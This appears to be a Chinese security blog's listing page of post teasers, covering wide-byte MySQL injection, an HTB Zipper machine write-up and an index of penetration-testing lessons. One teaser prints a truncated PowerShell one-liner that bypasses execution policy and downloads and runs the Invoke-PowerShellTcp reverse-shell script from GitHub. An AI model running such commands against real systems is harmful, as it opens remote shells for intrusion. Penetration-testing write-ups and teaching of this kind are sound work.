8、利用宽字节特性注入mysql 12
因为手里暂时也没什么现成的实际案例,所以就暂时先用demo简单演示下完整的宽字节注入流程,虽然是本地环境,但跟实战中其实并没太大差别,大家大可不用太过纠结,宽字节注入原型代码,如下: 当我们尝试经典的‘,一眼望去,貌似什么都没发生,把sql打出来sql才知道,原来’已经被adds...
Get shell By Powershell
Invoke-PowerShellTcp.ps1 powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/s...
HTB-靶机Zipper-writeup 18
Usually scan,nmap+dirb+gobuster+msftcp find zabbix,ver3.0.21: think about zabbix has jsrpc.php,any exploit?,json interface is not authorized...
亮神专辑,全部收录到博客,方便自己和墙内用户查看
致敬亮神原创 亮神专辑项目地址 亮神专辑gitbook 致敬k神原创——老博客 致敬k神原创-新站 第一课:windows提权-快速查找exp 第二课:Linux提权-依赖exp篇 第三课:Delphi代码审计--项目实战1 第四课:Asp代码审计--项目实战2 第五课:工具介绍...
搜索当前分类